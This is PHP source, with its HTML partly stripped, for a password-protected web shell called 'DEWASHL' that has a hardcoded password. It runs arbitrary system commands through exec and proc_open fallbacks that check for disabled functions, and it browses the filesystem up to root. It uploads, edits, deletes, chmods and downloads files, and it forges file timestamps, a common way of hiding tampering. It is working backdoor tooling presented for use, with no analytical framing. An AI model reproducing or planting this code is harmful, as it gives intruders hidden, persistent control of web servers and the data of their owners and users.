change directory * - Click file -> open editor (edit file) * - Show numeric chmod, modified date, owner/group * - Rename / Chmod / Edit Date / Delete / Download * - Single command output (no duplicate) * - Server Info panel * - Colored Perm column: green = full access, orange = partial (no write), red = denied */ error_reporting(0); set_time_limit(0); session_start(); /* ========== CONFIG ========== */ $PASSWORD = 'masterpiece11'; $MAX_ATTEMPTS = 6; $LOCK_SECONDS = 300; $ALLOW_BROWSE_ROOT = true; $CMD_TIMEOUT = 8; /* ============================ */ /* --- login/brute force --- */ if (!isset($_SESSION['attempts'])) $_SESSION['attempts'] = 0; if (!isset($_SESSION['locked_until'])) $_SESSION['locked_until'] = 0; if (isset($_GET['logout'])) { unset($_SESSION['logged']); header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } $now = time(); $login_error = ''; if ($now < $_SESSION['locked_until']) { $login_error = "Too many attempts. Try again after " . date('Y-m-d H:i:s', $_SESSION['locked_until']); } elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pwd']) && empty($_SESSION['logged'])) { if ($_POST['pwd'] === $PASSWORD) { $_SESSION['logged'] = true; $_SESSION['attempts'] = 0; header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit; } else { $_SESSION['attempts'] += 1; if ($_SESSION['attempts'] >= $MAX_ATTEMPTS) { $_SESSION['locked_until'] = time() + $LOCK_SECONDS; $login_error = "Too many attempts. Locked for {$LOCK_SECONDS} seconds."; } else { $login_error = "Wrong password. Attempts: {$_SESSION['attempts']}/{$MAX_ATTEMPTS}"; } } } if (empty($_SESSION['logged'])) { ?> Login — DS

DS — Login

Press L to quick prompt
&1'); if ($out !== null) return rtrim($out, "\n"); } // proc_open fallback if (function_exists('proc_open') && !in_array('proc_open', array_map('trim', explode(',', ini_get('disable_functions'))))) { $des = [1 => ['pipe','w'], 2 => ['pipe','w']]; $proc = @proc_open($cmd, $des, $pipes); if (is_resource($proc)) { stream_set_blocking($pipes[1], false); stream_set_blocking($pipes[2], false); $out = ''; $err = ''; $start = time(); while (true) { $r = [$pipes[1], $pipes[2]]; $w = $e = null; $ready = @stream_select($r, $w, $e, 0, 200000); if ($ready > 0) { foreach ($r as $pipe) { $chunk = stream_get_contents($pipe); if ($chunk !== false) { if ($pipe === $pipes[1]) $out .= $chunk; else $err .= $chunk; } } } $status = proc_get_status($proc); if (!$status['running']) break; if ((time() - $start) > $timeout) { proc_terminate($proc); $out .= "\n[Terminated: timeout {$timeout}s]"; break; } usleep(100000); } $out .= stream_get_contents($pipes[1]); $err .= stream_get_contents($pipes[2]); foreach ($pipes as $p) @fclose($p); @proc_close($proc); $combined = trim($out . "\n" . $err); return $combined === '' ? '[No output]' : $combined; } } return "[Command disabled on this server]"; } function owner_group($path) { $owner = @fileowner($path); $group = @filegroup($path); $on = $owner; $gn = $group; if (function_exists('posix_getpwuid') && $owner !== false) { $pw = @posix_getpwuid($owner); if ($pw && isset($pw['name'])) $on = $pw['name']; } if (function_exists('posix_getgrgid') && $group !== false) { $gr = @posix_getgrgid($group); if ($gr && isset($gr['name'])) $gn = $gr['name']; } return h($on . ':' . $gn); } function perm_color($path) { $read = is_readable($path); $write = is_writable($path); // exec isn't critical here; use it as additional sign $exec = is_executable($path); if ($read && $write) return 'perm-green'; if (!$read && !$write) return 'perm-red'; return 'perm-orange'; } /* ---------------- Main ---------------- */ $raw_path = isset($_REQUEST['path']) ? $_REQUEST['path'] : getcwd(); $resolved = resolve_path($raw_path); if ($resolved === false) { $message = "Access denied or invalid path."; $cwd = getcwd(); } else { $cwd = is_file($resolved) ? dirname($resolved) : $resolved; } @chdir($cwd); $message = ''; $cmd_output = ''; $edit_target = null; $edit_content = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { // upload if (isset($_POST['upload']) && isset($_FILES['upload_file'])) { $up = $_FILES['upload_file']; if (is_uploaded_file($up['tmp_name'])) { $dest = $cwd . DIRECTORY_SEPARATOR . basename($up['name']); if (move_uploaded_file($up['tmp_name'], $dest)) $message = "Uploaded: " . basename($up['name']); else $message = "Upload failed (permission?)."; } else $message = "No file uploaded."; } // create file if (!empty($_POST['newfile_name'])) { $nf = basename($_POST['newfile_name']); $p = $cwd . DIRECTORY_SEPARATOR . $nf; if (@file_put_contents($p, '') !== false) { $message = "File created: $nf"; } else $message = "Failed to create file: $nf"; header('Location: ?path=' . urlencode($cwd)); exit; } // create dir if (!empty($_POST['newdir_name'])) { $nd = basename($_POST['newdir_name']); $p = $cwd . DIRECTORY_SEPARATOR . $nd; if (@mkdir($p, 0755)) $message = "Folder created: $nd"; else $message = "Failed to create folder: $nd"; header('Location: ?path=' . urlencode($cwd)); exit; } // actions: delete/rename/chmod/edit/editdate if (isset($_POST['action'])) { $action = $_POST['action']; $t = isset($_POST['target']) ? resolve_path($_POST['target']) : false; if ($action === 'edit' && isset($_POST['target']) && isset($_POST['content'])) { $t = resolve_path($_POST['target']); if ($t && is_file($t)) { if (@file_put_contents($t, $_POST['content']) !== false) $message = "File saved."; else $message = "Save failed (permission?)."; } else $message = "Edit target invalid."; } elseif ($t && file_exists($t)) { if ($action === 'delete') { if (is_dir($t)) { if (@rmdir($t)) $message = "Folder deleted."; else $message = "Failed to delete folder (not empty or permission)."; } else { if (@unlink($t)) $message = "File deleted."; else $message = "Failed to delete file (permission?)."; } } elseif ($action === 'rename') { $nn = isset($_POST['newname']) ? basename($_POST['newname']) : ''; if ($nn !== '') { $dst = dirname($t) . DIRECTORY_SEPARATOR . $nn; if (@rename($t, $dst)) $message = "Renamed to $nn"; else $message = "Rename failed."; } else $message = "Invalid new name."; } elseif ($action === 'chmod') { $perm = isset($_POST['perm']) ? $_POST['perm'] : ''; $mode = intval($perm, 8); if (@chmod($t, $mode)) $message = "Permissions set to " . sprintf('%04o', $mode); else $message = "Chmod failed (permission?)."; } elseif ($action === 'editdate') { $nd = isset($_POST['newdatetime']) ? $_POST['newdatetime'] : ''; $dt = DateTime::createFromFormat('Y-m-d\TH:i', $nd); if ($dt) { if (@touch($t, $dt->getTimestamp())) $message = "Timestamp updated."; else $message = "Failed to update timestamp (permission?)."; } else $message = "Invalid input for edit date."; } } } // command (top) if (isset($_POST['command']) && trim($_POST['command']) !== '') { $cmd_output = run_command($_POST['command'], $CMD_TIMEOUT); } } // download via GET if (isset($_GET['download']) && isset($_GET['target'])) { $t = resolve_path($_GET['target']); if ($t && is_file($t)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($t) . '"'); header('Content-Length: ' . filesize($t)); readfile($t); exit; } else { $message = "Download failed: file not found or access denied."; } } // prepare listing $items = @scandir($cwd); $dirs = []; $files = []; if ($items && is_array($items)) { foreach ($items as $it) { if ($it === '.' || $it === '..') continue; $full = $cwd . DIRECTORY_SEPARATOR . $it; if (is_dir($full)) $dirs[] = $it; else $files[] = $it; } sort($dirs, SORT_NATURAL|SORT_FLAG_CASE); sort($files, SORT_NATURAL|SORT_FLAG_CASE); } $all = array_merge($dirs, $files); /* breadcrumbs */ function crumbs($cwd){ $parts = preg_split('#/+/#', $cwd, -1, PREG_SPLIT_NO_EMPTY); $crumbs = []; $acc = ($cwd[0] === '/') ? '/' : ''; if ($acc === '/') $crumbs[] = ['name'=>'/','path'=>'/']; foreach ($parts as $p) { if ($acc === '/' || $acc === '') $acc .= $p; else $acc .= '/' . $p; $crumbs[] = ['name'=>$p, 'path'=>$acc]; } return $crumbs; } function server_info() { $info = []; $info['PHP Version'] = PHP_VERSION; $info['OS'] = php_uname(); $info['User'] = get_current_user(); $info['CWD'] = getcwd(); $info['Memory Limit'] = ini_get('memory_limit'); $info['Upload Max Filesize'] = ini_get('upload_max_filesize'); $info['Post Max Size'] = ini_get('post_max_size'); $info['Max Execution Time'] = ini_get('max_execution_time'); $info['Disabled Functions'] = ini_get('disable_functions') ?: '(none)'; $info['Safe Mode'] = ini_get('safe_mode') ? ini_get('safe_mode') : '(n/a)'; $df = @disk_free_space('.') !== false ? @disk_free_space('.') : null; $dt = @disk_total_space('.') !== false ? @disk_total_space('.') : null; if ($df !== null && $dt !== null) $info['Disk'] = round($df/1024/1024,2) . ' MB free / ' . round($dt/1024/1024,2) . ' MB total'; $load = function_exists('sys_getloadavg') ? @sys_getloadavg() : null; if ($load) $info['Load Average'] = implode(', ', $load); // uptime (linux) if (is_readable('/proc/uptime')) { $u = @file_get_contents('/proc/uptime'); if ($u) { $s = floatval(explode(' ', $u)[0]); $info['Uptime'] = gmdate('H:i:s', (int)$s); } } // cpu info (linux) if (is_readable('/proc/cpuinfo')) { $c = @file_get_contents('/proc/cpuinfo'); if ($c) { if (preg_match('/model name\s+:\s+(.+)/', $c, $m)) $info['CPU Model'] = trim($m[1]); } } return $info; } ?> DEWASHL — <?=h($cwd)?>
📁 DS
Logout
/
'; } foreach ($dirs as $d): $full = $cwd . DIRECTORY_SEPARATOR . $d; $perms = @fileperms($full) ? sprintf('%04o', fileperms($full) & 07777) : '----'; $mtime = is_file($full) || is_dir($full) ? date('Y-m-d H:i:s', @filemtime($full)) : '-'; $og = owner_group($full); $pclass = perm_color($full); ?>
NamePermOwner/GroupModifiedSizeActions
⬆ Parent: ' . h($parent) . '
📁 - RENAME CHMD DATE DEL
📄 DWNLD RENAME CHMOD DATE DEL
Command
Refresh
Server Info
$v): ?>
:
✏ Edit:
Cancel
Klik nama file untuk mengedit. Klik folder untuk pindah direktori.